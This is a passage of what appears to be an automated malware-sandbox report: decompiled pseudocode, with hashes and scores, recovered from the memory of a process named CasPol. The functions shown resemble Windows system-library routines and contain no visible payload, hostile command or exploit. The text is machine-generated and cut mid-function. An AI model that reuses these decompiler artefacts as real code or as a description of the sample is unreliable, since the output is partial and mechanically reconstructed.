                                                                						_t58 =  *_t26;
                                                                					}
                                                                					 *_t90 = _t58;
                                                                					goto L15;
                                                                				} else {
                                                                					goto L2;
                                                                				}
                                                                				while(1) {
                                                                					_t116 =  *_t61 & 0x0000ffff;
                                                                					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                					if(_t116 == _t128) {
                                                                						goto L18;
                                                                					}
                                                                					L5:
                                                                					if(_t116 >= 0x61) {
                                                                						if(_t116 > 0x7a) {
                                                                							_t97 =  *0x1716d5c; // 0x7f590654
                                                                							_t72 =  *0x1716d5c; // 0x7f590654
                                                                							_t75 =  *0x1716d5c; // 0x7f590654
                                                                							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                						} else {
                                                                							_t116 = _t116 - 0x20;
                                                                						}
                                                                					}
                                                                					if(_t128 >= 0x61) {
                                                                						if(_t128 > 0x7a) {
                                                                							_t102 =  *0x1716d5c; // 0x7f590654
                                                                							_t84 =  *0x1716d5c; // 0x7f590654
                                                                							_t87 =  *0x1716d5c; // 0x7f590654
                                                                							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                						} else {
                                                                							_t128 = _t128 - 0x20;
                                                                						}
                                                                					}
                                                                					if(_t116 == _t128) {
                                                                						_t61 = _v12;
                                                                						_t96 = _v8;
                                                                					} else {
                                                                						_t113 = _t116 - _t128;
                                                                						L9:
                                                                						_t111 = _a4;
                                                                						if(_t113 == 0) {
                                                                							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                							_t33 =  &(_t119[1]); // 0x100
                                                                							_t120 = _a8;
                                                                							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                							_t35 = _t95 - 1; // 0xff
                                                                							_t124 = _t35;
                                                                							if(_t120 == 0) {
                                                                								L27:
                                                                								 *_a16 = _t95;
                                                                								_t56 = 0xc0000023;
                                                                								goto L16;
                                                                							}
                                                                							if(_t124 >= _a12) {
                                                                								if(_a12 >= 1) {
                                                                									 *_t120 = 0;
                                                                								}
                                                                								goto L27;
                                                                							}
                                                                							 *_a16 = _t124;
                                                                							_t125 = _t124 + _t124;
                                                                							E0166F3E0(_t120, _t115, _t125);
                                                                							_t56 = 0;
                                                                							 *((short*)(_t125 + _t120)) = 0;
                                                                							goto L16;
                                                                						}
                                                                						_t119 =  &(_t119[2]);
                                                                						if(_t119 < _v24) {
                                                                							L2:
                                                                							_t91 =  *_t119;
                                                                							_t61 = _t91;
                                                                							_v12 = _t61;
                                                                							_t112 =  &(_t61[_t111]);
                                                                							_v8 = _t112;
                                                                							if(_t61 >= _t112) {
                                                                								break;
                                                                							} else {
                                                                								_t127 = _v16 - _t91;
                                                                								_t96 = _t112;
                                                                								_v20 = _t127;
                                                                								_t116 =  *_t61 & 0x0000ffff;
                                                                								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                								if(_t116 == _t128) {
                                                                									goto L18;
                                                                								}
                                                                								goto L5;
                                                                							}
                                                                						} else {
                                                                							_t90 = _v28;
                                                                							_t57 = _v32;
                                                                							_t123 = _v36;
                                                                							goto L12;
                                                                						}
                                                                					}
                                                                					L18:
                                                                					_t61 =  &(_t61[1]);
                                                                					_v12 = _t61;
                                                                					if(_t61 >= _t96) {
                                                                						break;
                                                                					}
                                                                					_t127 = _v20;
                                                                				}
                                                                				_t113 = 0;
                                                                				goto L9;
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0954312c4f1f242390bced5f6be5ffb343dd22b2227c5e6f079e546723bf84c0
                                                                • Instruction ID: fad5b7abdc27927bb0f2301bb1f6ae3fb05c4adc3e7353758e27c321e1dd2b2d
                                                                • Opcode Fuzzy Hash: 0954312c4f1f242390bced5f6be5ffb343dd22b2227c5e6f079e546723bf84c0
                                                                • Instruction Fuzzy Hash: B551AF76A00125CFCB59CF1CCCA09BDB7B1FB88704B19855EEC56AB315D734AA91CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			E016EAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed short* _t36;
                                                                				signed int _t41;
                                                                				char* _t42;
                                                                				intOrPtr _t43;
                                                                				signed int _t47;
                                                                				void* _t52;
                                                                				signed int _t57;
                                                                				intOrPtr _t61;
                                                                				signed char _t62;
                                                                				signed int _t72;
                                                                				signed char _t85;
                                                                				signed int _t88;
                                                                
                                                                				_t73 = __edx;
                                                                				_push(__ecx);
                                                                				_t85 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                                                				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                                                				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                                					_t57 = _t57 | 0x00000001;
                                                                				}
                                                                				_t88 = 0;
                                                                				_t36 = 0;
                                                                				_t96 = _a12;
                                                                				if(_a12 == 0) {
                                                                					_t62 = _a8;
                                                                					__eflags = _t62;
                                                                					if(__eflags == 0) {
                                                                						goto L12;
                                                                					}
                                                                					_t52 = E016EC38B(_t85, _t73, _t57, 0);
                                                                					_t62 = _a8;
                                                                					 *_t62 = _t52;
                                                                					_t36 = 0;
                                                                					goto L11;
                                                                				} else {
                                                                					_t36 = E016EACFD(_t85, _t73, _t96, _t57, _a8);
                                                                					if(0 == 0 || 0 == 0xffffffff) {
                                                                						_t72 = _t88;
                                                                					} else {
                                                                						_t72 =  *0x00000000 & 0x0000ffff;
                                                                					}
                                                                					 *_a12 = _t72;
                                                                					_t62 = _a8;
                                                                					L11:
                                                                					_t73 = _v8;
                                                                					L12:
                                                                					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                                                						L19:
                                                                						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                                                							L22:
                                                                							_t74 = _v8;
                                                                							__eflags = _v8;
                                                                							if(__eflags != 0) {
                                                                								L25:
                                                                								__eflags = _t88 - 2;
                                                                								if(_t88 != 2) {
                                                                									__eflags = _t85 + 0x44 + (_t88 << 6);
                                                                									_t88 = E016EFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                                                									goto L34;
                                                                								}
                                                                								L26:
                                                                								_t59 = _v8;
                                                                								E016EEA55(_t85, _v8, _t57);
                                                                								asm("sbb esi, esi");
                                                                								_t88 =  ~_t88;
                                                                								_t41 = E01647D50();
                                                                								__eflags = _t41;
                                                                								if(_t41 == 0) {
                                                                									_t42 = 0x7ffe0380;
                                                                								} else {
                                                                									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                								}
                                                                								__eflags =  *_t42;
                                                                								if( *_t42 != 0) {
                                                                									_t43 =  *[fs:0x30];
                                                                									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                                                									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                                                										__eflags = _t88;
                                                                										if(_t88 != 0) {
                                                                											E016E1608(_t85, _t59, 3);
                                                                										}
                                                                									}
                                                                								}
                                                                								goto L34;
                                                                							}
                                                                							_push(_t62);
                                                                							_t47 = E016F1536(0x1718ae4, (_t74 -  *0x1718b04 >> 0x14) + (_t74 -  *0x1718b04 >> 0x14), _t88, __eflags);
                                                                							__eflags = _t47;
                                                                							if(_t47 == 0) {
                                                                								goto L26;
                                                                							}
                                                                							_t74 = _v12;
                                                                							_t27 = _t47 - 1; // -1
                                                                							_t88 = _t27;
                                                                							goto L25;
                                                                						}
                                                                						_t62 = _t85;
                                                                						if(L016EC323(_t62, _v8, _t57) != 0xffffffff) {
                                                                							goto L22;
                                                                						}
                                                                						_push(_t62);
                                                                						_push(_t88);
                                                                						E016EA80D(_t85, 9, _v8, _t88);
                                                                						goto L34;
                                                                					} else {
                                                                						_t101 = _t36;
                                                                						if(_t36 != 0) {
                                                                							L16:
                                                                							if(_t36 == 0xffffffff) {
                                                                								goto L19;
                                                                							}
                                                                							_t62 =  *((intOrPtr*)(_t36 + 2));
                                                                							if((_t62 & 0x0000000f) == 0) {
                                                                								goto L19;
                                                                							}
                                                                							_t62 = _t62 & 0xf;
                                                                							if(E016CCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                                                								L34:
                                                                								return _t88;
                                                                							}
                                                                							goto L19;
                                                                						}
                                                                						_t62 = _t85;
                                                                						_t36 = E016EACFD(_t62, _t73, _t101, _t57, _t62);
                                                                						if(_t36 == 0) {
                                                                							goto L19;
                                                                						}
                                                                						goto L16;
                                                                					}
                                                                				}
                                                                			}




















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5e896cdb3e51bdf1e16720b36a1fd3954c1d7fdf208df86d8ee007553c1a5d8
                                                                • Instruction ID: c9dbbd4de32afd05969f4065e28b445ace661928987d36f83060ee1cb8ec7652
                                                                • Opcode Fuzzy Hash: f5e896cdb3e51bdf1e16720b36a1fd3954c1d7fdf208df86d8ee007553c1a5d8
                                                                • Instruction Fuzzy Hash: 8A41B0B17026119BE7269BADCC9CB3BBBDAAF94620F04831DF956873D0DB34D801D691
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			E0164DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                				char _v5;
                                                                				signed int _v12;
                                                                				signed int* _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				intOrPtr _v40;
                                                                				intOrPtr _v44;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed int _t54;
                                                                				char* _t58;
                                                                				signed int _t66;
                                                                				intOrPtr _t67;
                                                                				intOrPtr _t68;
                                                                				intOrPtr _t72;
                                                                				intOrPtr _t73;
                                                                				signed int* _t75;
                                                                				intOrPtr _t79;
                                                                				intOrPtr _t80;
                                                                				char _t82;
                                                                				signed int _t83;
                                                                				signed int _t84;
                                                                				signed int _t88;
                                                                				signed int _t89;
                                                                				intOrPtr _t90;
                                                                				intOrPtr _t92;
                                                                				signed int _t97;
                                                                				intOrPtr _t98;
                                                                				intOrPtr* _t99;
                                                                				signed int* _t101;
                                                                				signed int* _t102;
                                                                				intOrPtr* _t103;
                                                                				intOrPtr _t105;
                                                                				signed int _t106;
                                                                				void* _t118;
                                                                
                                                                				_t92 = __edx;
                                                                				_t75 = _a4;
                                                                				_t98 = __ecx;
                                                                				_v44 = __edx;
                                                                				_t106 = _t75[1];
                                                                				_v40 = __ecx;
                                                                				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                					_t82 = 0;
                                                                				} else {
                                                                					_t82 = 1;
                                                                				}
                                                                				_v5 = _t82;
                                                                				_t6 = _t98 + 0xc8; // 0xc9
                                                                				_t101 = _t6;
                                                                				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                				if(_t82 != 0) {
                                                                					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                					_t83 =  *_t75;
                                                                					_t54 = _t75[1];
                                                                					 *_t101 = _t83;
                                                                					_t84 = _t83 | _t54;
                                                                					_t101[1] = _t54;
                                                                					if(_t84 == 0) {
                                                                						_t101[1] = _t101[1] & _t84;
                                                                						 *_t101 = 1;
                                                                					}
                                                                					goto L19;
                                                                				} else {
                                                                					if(_t101 == 0) {
                                                                						E0162CC50(E01624510(0xc000000d));
                                                                						_t88 =  *_t101;
                                                                						_t97 = _t101[1];
                                                                						L15:
                                                                						_v12 = _t88;
                                                                						_t66 = _t88 -  *_t75;
                                                                						_t89 = _t97;
                                                                						asm("sbb ecx, [ebx+0x4]");
                                                                						_t118 = _t89 - _t97;
                                                                						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                							_t66 = _t66 | 0xffffffff;
                                                                							_t89 = 0x7fffffff;
                                                                						}
                                                                						 *_t101 = _t66;
                                                                						_t101[1] = _t89;
                                                                						L19:
                                                                						if(E01647D50() != 0) {
                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                						} else {
                                                                							_t58 = 0x7ffe0386;
                                                                						}
                                                                						_t102 = _v16;
                                                                						if( *_t58 != 0) {
                                                                							_t58 = E016F8ED6(_t102, _t98);
                                                                						}
                                                                						_t76 = _v44;
                                                                						E01642280(_t58, _v44);
                                                                						E0164DD82(_v44, _t102, _t98);
                                                                						E0164B944(_t102, _v5);
                                                                						return E0163FFB0(_t76, _t98, _t76);
                                                                					}
                                                                					_t99 = 0x7ffe03b0;
                                                                					do {
                                                                						_t103 = 0x7ffe0010;
                                                                						do {
                                                                							_t67 =  *0x1718628; // 0x0
                                                                							_v28 = _t67;
                                                                							_t68 =  *0x171862c; // 0x0
                                                                							_v32 = _t68;
                                                                							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                							_v20 =  *_t99;
                                                                							while(1) {
                                                                								_t97 =  *0x7ffe000c;
                                                                								_t90 =  *0x7FFE0008;
                                                                								if(_t97 ==  *_t103) {
                                                                									goto L10;
                                                                								}
                                                                								asm("pause");
                                                                							}
                                                                							L10:
                                                                							_t79 = _v24;
                                                                							_t99 = 0x7ffe03b0;
                                                                							_v12 =  *0x7ffe03b0;
                                                                							_t72 =  *0x7FFE03B4;
                                                                							_t103 = 0x7ffe0010;
                                                                							_v36 = _t72;
                                                                						} while (_v20 != _v12 || _t79 != _t72);
                                                                						_t73 =  *0x1718628; // 0x0
                                                                						_t105 = _v28;
                                                                						_t80 =  *0x171862c; // 0x0
                                                                					} while (_t105 != _t73 || _v32 != _t80);
                                                                					_t98 = _v40;
                                                                					asm("sbb edx, [ebp-0x20]");
                                                                					_t88 = _t90 - _v12 - _t105;
                                                                					_t75 = _a4;
                                                                					asm("sbb edx, eax");
                                                                					_t31 = _t98 + 0xc8; // 0x16efb53
                                                                					_t101 = _t31;
                                                                					 *_t101 = _t88;
                                                                					_t101[1] = _t97;
                                                                					goto L15;
                                                                				}
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce8cc469085d60bc50df5448c6082cd2966de33ebf6e26ebbb912e528492b949
                                                                • Instruction ID: cd0405acb86cee3dabeabc049f1d910b483496208a581f608b04ae56210022fe
                                                                • Opcode Fuzzy Hash: ce8cc469085d60bc50df5448c6082cd2966de33ebf6e26ebbb912e528492b949
                                                                • Instruction Fuzzy Hash: 2B51DE72E00216CFCB15CFACC890AAEBBF6FF59310F20815AD995A7304DB30A940CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 96%
                                                                			E0163EF40(intOrPtr __ecx) {
                                                                				char _v5;
                                                                				char _v6;
                                                                				char _v7;
                                                                				char _v8;
                                                                				signed int _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				intOrPtr _t58;
                                                                				char _t59;
                                                                				signed char _t69;
                                                                				void* _t73;
                                                                				signed int _t74;
                                                                				char _t79;
                                                                				signed char _t81;
                                                                				signed int _t85;
                                                                				signed int _t87;
                                                                				intOrPtr _t90;
                                                                				signed char* _t91;
                                                                				void* _t92;
                                                                				signed int _t94;
                                                                				void* _t96;
                                                                
                                                                				_t90 = __ecx;
                                                                				_v16 = __ecx;
                                                                				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                					_t58 =  *((intOrPtr*)(__ecx));
                                                                					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                						E01629080(_t73, __ecx, __ecx, _t92);
                                                                					}
                                                                				}
                                                                				_t74 = 0;
                                                                				_t96 =  *0x7ffe036a - 1;
                                                                				_v12 = 0;
                                                                				_v7 = 0;
                                                                				if(_t96 > 0) {
                                                                					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                					_v12 = _t74;
                                                                					_v7 = _t96 != 0;
                                                                				}
                                                                				_t79 = 0;
                                                                				_v8 = 0;
                                                                				_v5 = 0;
                                                                				while(1) {
                                                                					L4:
                                                                					_t59 = 1;
                                                                					L5:
                                                                					while(1) {
                                                                						if(_t59 == 0) {
                                                                							L12:
                                                                							_t21 = _t90 + 4; // 0x7788c21e
                                                                							_t87 =  *_t21;
                                                                							_v6 = 0;
                                                                							if(_t79 != 0) {
                                                                								if((_t87 & 0x00000002) != 0) {
                                                                									goto L19;
                                                                								}
                                                                								if((_t87 & 0x00000001) != 0) {
                                                                									_v6 = 1;
                                                                									_t74 = _t87 ^ 0x00000003;
                                                                								} else {
                                                                									_t51 = _t87 - 2; // -2
                                                                									_t74 = _t51;
                                                                								}
                                                                								goto L15;
                                                                							} else {
                                                                								if((_t87 & 0x00000001) != 0) {
                                                                									_v6 = 1;
                                                                									_t74 = _t87 ^ 0x00000001;
                                                                								} else {
                                                                									_t26 = _t87 - 4; // -4
                                                                									_t74 = _t26;
                                                                									if((_t74 & 0x00000002) == 0) {
                                                                										_t74 = _t74 - 2;
                                                                									}
                                                                								}
                                                                								L15:
                                                                								if(_t74 == _t87) {
                                                                									L19:
                                                                									E01622D8A(_t74, _t90, _t87, _t90);
                                                                									_t74 = _v12;
                                                                									_v8 = 1;
                                                                									if(_v7 != 0 && _t74 > 0x64) {
                                                                										_t74 = _t74 - 1;
                                                                										_v12 = _t74;
                                                                									}
                                                                									_t79 = _v5;
                                                                									goto L4;
                                                                								}
                                                                								asm("lock cmpxchg [esi], ecx");
                                                                								if(_t87 != _t87) {
                                                                									_t74 = _v12;
                                                                									_t59 = 0;
                                                                									_t79 = _v5;
                                                                									continue;
                                                                								}
                                                                								if(_v6 != 0) {
                                                                									_t74 = _v12;
                                                                									L25:
                                                                									if(_v7 != 0) {
                                                                										if(_t74 < 0x7d0) {
                                                                											if(_v8 == 0) {
                                                                												_t74 = _t74 + 1;
                                                                											}
                                                                										}
                                                                										_t38 = _t90 + 0x14; // 0x0
                                                                										_t39 = _t90 + 0x14; // 0x0
                                                                										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                											_t85 = _t85 & 0xff000000;
                                                                										}
                                                                										 *(_t90 + 0x14) = _t85;
                                                                									}
                                                                									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                									return 0;
                                                                								}
                                                                								_v5 = 1;
                                                                								_t87 = _t74;
                                                                								goto L19;
                                                                							}
                                                                						}
                                                                						_t94 = _t74;
                                                                						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                						if(_t74 == 0) {
                                                                							goto L12;
                                                                						} else {
                                                                							_t91 = _t90 + 4;
                                                                							goto L8;
                                                                							L9:
                                                                							while((_t81 & 0x00000001) != 0) {
                                                                								_t69 = _t81;
                                                                								asm("lock cmpxchg [edi], edx");
                                                                								if(_t69 != _t81) {
                                                                									_t81 = _t69;
                                                                									continue;
                                                                								}
                                                                								_t90 = _v16;
                                                                								goto L25;
                                                                							}
                                                                							asm("pause");
                                                                							_t94 = _t94 - 1;
                                                                							if(_t94 != 0) {
                                                                								L8:
                                                                								_t81 =  *_t91;
                                                                								goto L9;
                                                                							} else {
                                                                								_t90 = _v16;
                                                                								_t79 = _v5;
                                                                								goto L12;
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                			}

                                                                0x00000000
                                                                0x0163efb2
                                                                0x0163f036
                                                                0x0163f03a
                                                                0x0163f040
                                                                0x0163f090
                                                                0x00000000
                                                                0x0163f092
                                                                0x0163f042
                                                                0x00000000
                                                                0x0163f042
                                                                0x0163efb7
                                                                0x0163efb9
                                                                0x0163efbc
                                                                0x0163efb0
                                                                0x0163efb0
                                                                0x00000000
                                                                0x0163efbe
                                                                0x0163efbe
                                                                0x0163efc1
                                                                0x00000000
                                                                0x0163efc1
                                                                0x0163efbc
                                                                0x0163efaa
                                                                0x0163ef91

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                • Instruction ID: a095f44a84e991dfd6da76de6ec92936d50093c39987e71aca6e6577a63db549
                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                • Instruction Fuzzy Hash: D8510430E04649DFEB25CB6CC9A07AEFBB1AF85314F1881ACD54553382C7B6A989C752
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 84%
                                                                			E016F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                				signed short* _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _t55;
                                                                				void* _t56;
                                                                				intOrPtr* _t66;
                                                                				intOrPtr* _t69;
                                                                				void* _t74;
                                                                				intOrPtr* _t78;
                                                                				intOrPtr* _t81;
                                                                				intOrPtr* _t82;
                                                                				intOrPtr _t83;
                                                                				signed short* _t84;
                                                                				intOrPtr _t85;
                                                                				signed int _t87;
                                                                				intOrPtr* _t90;
                                                                				intOrPtr* _t93;
                                                                				intOrPtr* _t94;
                                                                				void* _t98;
                                                                
                                                                				_t84 = __edx;
                                                                				_t80 = __ecx;
                                                                				_push(__ecx);
                                                                				_push(__ecx);
                                                                				_t55 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t87 =  *__edx & 0x0000ffff;
                                                                				_v12 = __ecx;
                                                                				_t3 = _t55 + 0x154; // 0x154
                                                                				_t93 = _t3;
                                                                				_t78 =  *_t93;
                                                                				_t4 = _t87 + 2; // 0x2
                                                                				_t56 = _t4;
                                                                				while(_t78 != _t93) {
                                                                					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                						L4:
                                                                						_t78 =  *_t78;
                                                                						continue;
                                                                					} else {
                                                                						_t7 = _t78 + 0x18; // 0x18
                                                                						if(E0167D4F0(_t7, _t84[2], _t87) == _t87) {
                                                                							_t40 = _t78 + 0xc; // 0xc
                                                                							_t94 = _t40;
                                                                							_t90 =  *_t94;
                                                                							while(_t90 != _t94) {
                                                                								_t41 = _t90 + 8; // 0x8
                                                                								_t74 = E0166F380(_a4, _t41, 0x10);
                                                                								_t98 = _t98 + 0xc;
                                                                								if(_t74 != 0) {
                                                                									_t90 =  *_t90;
                                                                									continue;
                                                                								}
                                                                								goto L12;
                                                                							}
                                                                							_t82 = L01644620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                							if(_t82 != 0) {
                                                                								_t46 = _t78 + 0xc; // 0xc
                                                                								_t69 = _t46;
                                                                								asm("movsd");
                                                                								asm("movsd");
                                                                								asm("movsd");
                                                                								asm("movsd");
                                                                								_t85 =  *_t69;
                                                                								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                									L20:
                                                                									_t82 = 3;
                                                                									asm("int 0x29");
                                                                								}
                                                                								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                								 *_t82 = _t85;
                                                                								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                								 *_t69 = _t82;
                                                                								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                								goto L11;
                                                                							} else {
                                                                								L18:
                                                                								_push(0xe);
                                                                								_pop(0);
                                                                							}
                                                                						} else {
                                                                							_t84 = _v8;
                                                                							_t9 = _t87 + 2; // 0x2
                                                                							_t56 = _t9;
                                                                							goto L4;
                                                                						}
                                                                					}
                                                                					L12:
                                                                					return 0;
                                                                				}
                                                                				_t10 = _t87 + 0x1a; // 0x1a
                                                                				_t78 = L01644620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                				if(_t78 == 0) {
                                                                					goto L18;
                                                                				} else {
                                                                					_t12 = _t87 + 2; // 0x2
                                                                					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                					_t16 = _t78 + 0x18; // 0x18
                                                                					E0166F3E0(_t16, _v8[2], _t87);
                                                                					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                					_t19 = _t78 + 0xc; // 0xc
                                                                					_t66 = _t19;
                                                                					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                					 *_t66 = _t66;
                                                                					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                					_t81 = L01644620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                					if(_t81 == 0) {
                                                                						goto L18;
                                                                					} else {
                                                                						_t26 = _t78 + 0xc; // 0xc
                                                                						_t69 = _t26;
                                                                						asm("movsd");
                                                                						asm("movsd");
                                                                						asm("movsd");
                                                                						asm("movsd");
                                                                						_t85 =  *_t69;
                                                                						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                							goto L20;
                                                                						} else {
                                                                							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                							 *_t81 = _t85;
                                                                							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                							 *_t69 = _t81;
                                                                							_t83 = _v12;
                                                                							 *(_t78 + 8) = 1;
                                                                							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                							_t34 = _t83 + 0x154; // 0x1ba
                                                                							_t69 = _t34;
                                                                							_t85 =  *_t69;
                                                                							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                								goto L20;
                                                                							} else {
                                                                								 *_t78 = _t85;
                                                                								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                								 *_t69 = _t78;
                                                                								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                							}
                                                                						}
                                                                						goto L11;
                                                                					}
                                                                				}
                                                                				goto L12;
                                                                			}


                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                • Instruction ID: 93663e2e4eb91d92cc9469e79171e0c229a1af65c4aea9d07e1b9f5c4ca718e1
                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                • Instruction Fuzzy Hash: 58519071600646EFDB16CF58D884A96BBB5FF45304F14C0AEEA08DF252EB71E946CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 97%
                                                                			E01652990() {
                                                                				signed int* _t62;
                                                                				signed int _t64;
                                                                				intOrPtr _t66;
                                                                				signed short* _t69;
                                                                				intOrPtr _t76;
                                                                				signed short* _t79;
                                                                				void* _t81;
                                                                				signed int _t82;
                                                                				signed short* _t83;
                                                                				signed int _t87;
                                                                				intOrPtr _t91;
                                                                				void* _t98;
                                                                				signed int _t99;
                                                                				void* _t101;
                                                                				signed int* _t102;
                                                                				void* _t103;
                                                                				void* _t104;
                                                                				void* _t107;
                                                                
                                                                				_push(0x20);
                                                                				_push(0x16fff00);
                                                                				E0167D08C(_t81, _t98, _t101);
                                                                				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                				_t99 = 0;
